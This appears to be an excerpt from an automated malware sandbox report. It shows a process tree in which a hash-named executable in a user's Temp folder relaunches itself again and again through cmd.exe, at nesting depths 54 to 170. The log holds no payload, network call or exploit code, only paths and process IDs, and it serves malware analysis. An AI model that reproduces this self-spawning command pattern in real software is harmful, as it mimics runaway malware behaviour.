C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
54⤵
PID:5796

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
55⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
56⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
57⤵
PID:1968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
58⤵
PID:4992

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
59⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
60⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
61⤵
PID:5808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
62⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
63⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
64⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
65⤵
PID:5520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
66⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
67⤵
PID:1388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
68⤵
PID:5312

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
69⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
70⤵
PID:4640

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
71⤵
PID:248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
72⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
73⤵
PID:1868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
74⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
75⤵
PID:5772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
76⤵
PID:4348

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
77⤵
PID:572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
78⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
79⤵
PID:5980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
80⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
81⤵
PID:472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
82⤵
PID:5936

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
83⤵
PID:5448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
84⤵
PID:4904

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
85⤵
PID:3476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
86⤵
PID:1836

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
87⤵
PID:5876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
88⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
89⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
90⤵
PID:4880

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
91⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
92⤵
PID:3828

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
93⤵
PID:5304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
94⤵
PID:3304

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
95⤵
PID:5188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
96⤵
PID:1620

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
97⤵
PID:5992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
98⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
99⤵
PID:4484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
100⤵
PID:6096

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
101⤵
PID:6072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
102⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
103⤵
PID:4904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
104⤵
PID:3784

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
105⤵
PID:5588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
106⤵
PID:4640

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
107⤵
PID:324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
108⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
109⤵
PID:3724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
110⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
111⤵
PID:5380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
112⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
113⤵
PID:3776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
114⤵
PID:5992

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
115⤵
PID:2472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
116⤵
PID:1440

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
117⤵
PID:1068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
118⤵
PID:5996

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
119⤵
PID:6096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
120⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
121⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
122⤵
PID:2372

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
123⤵
PID:5876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
124⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
125⤵
PID:3916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
126⤵
PID:2216

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
127⤵
PID:2708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
128⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
129⤵
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
130⤵
PID:800

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
131⤵
PID:4140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
132⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
133⤵
PID:5452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
134⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
135⤵
PID:2832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
136⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
137⤵
PID:1588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
138⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
139⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
140⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
141⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
142⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
143⤵
PID:2792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
144⤵
PID:232

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
145⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
146⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
147⤵
PID:1620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
148⤵
PID:3776

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
149⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
150⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
151⤵
PID:248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
152⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
153⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
154⤵
PID:5292

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
155⤵
PID:4840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
156⤵
PID:572

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
157⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
158⤵
PID:972

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
159⤵
PID:5500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
160⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
161⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
162⤵
PID:1428

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
163⤵
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
164⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
165⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
166⤵
PID:764

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
167⤵
PID:2312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
168⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
169⤵
PID:1036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
170⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
